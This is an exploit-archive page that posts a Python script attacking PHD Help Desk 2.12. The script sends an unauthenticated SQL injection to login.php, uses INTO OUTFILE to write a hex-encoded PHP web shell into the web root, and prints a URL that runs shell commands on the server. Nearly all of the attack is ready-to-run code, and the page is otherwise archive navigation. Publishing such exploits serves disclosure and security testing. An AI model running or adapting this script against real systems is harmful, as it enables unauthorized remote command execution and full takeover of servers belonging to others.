PHD Help Desk 2.12 SQL Injection

PHD Help Desk 2.12 SQL Injection: Posted Jun 4, 2013; Authored by drone; PHD Help Desk version 2.12 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 5bd6713ae091f3a88456a992a6a2c14fd6a5cd823bb577c71eac2b768737e167; Download | Favorite | View

PHD Help Desk 2.12 SQL Injection

# Exploit Title: PHD Help Desk 2.12 SQLi
# Date: 05/24/2013
# Exploit Author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html
# Vendor Homepage: http://www.p-hd.com.ar/
# Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip
# Version: 2.12
# Tested on: Ubuntu 12.04 (apparmor disabled)
 
""" This app is so full of SQLi & XSS; if you're looking for
    practice with real web apps, this is a good place to go.
 
    You don't need auth for this.
"""
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys
 
def run(options):
    print '[!] Dropping web shell on %s...'%(options.ip)
 
    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
 
    # <? php system($_GET["rr"]); ?>
    data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'
                                    ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'
                                        ' \'{0}/{1}.php'.format(options.path,shell)),
                             'contrasenia':'pass',
                             'submit':'Enter',
                             'captcha':''})
 
    urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)
    print '[!] Shell dropped.  http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)
 
def parse():
    parser = ArgumentParser()
    parser.add_argument('-i',help='server address',action='store',dest='ip')
    parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',
                default='/phd_2_12', dest='rootp')
    parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',
                default='/var/www/phd_2_12/', action='store', dest='path')
 
    options = parser.parse_args()
    if not options.ip:
        parser.print_help()
        sys.exit(1)
 
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]
    return options
 
if __name__=="__main__":
    run(parse())

Top Authors In Last 30 Days

Red Hat 247 files
Ubuntu 90 files
indoushka 54 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 13 files
Gentoo 11 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,087)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,608)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,440)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,726)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

PHD Help Desk 2.12 SQL Injection

PHD Help Desk 2.12 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHD Help Desk 2.12 SQL Injection

Share This

PHD Help Desk 2.12 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems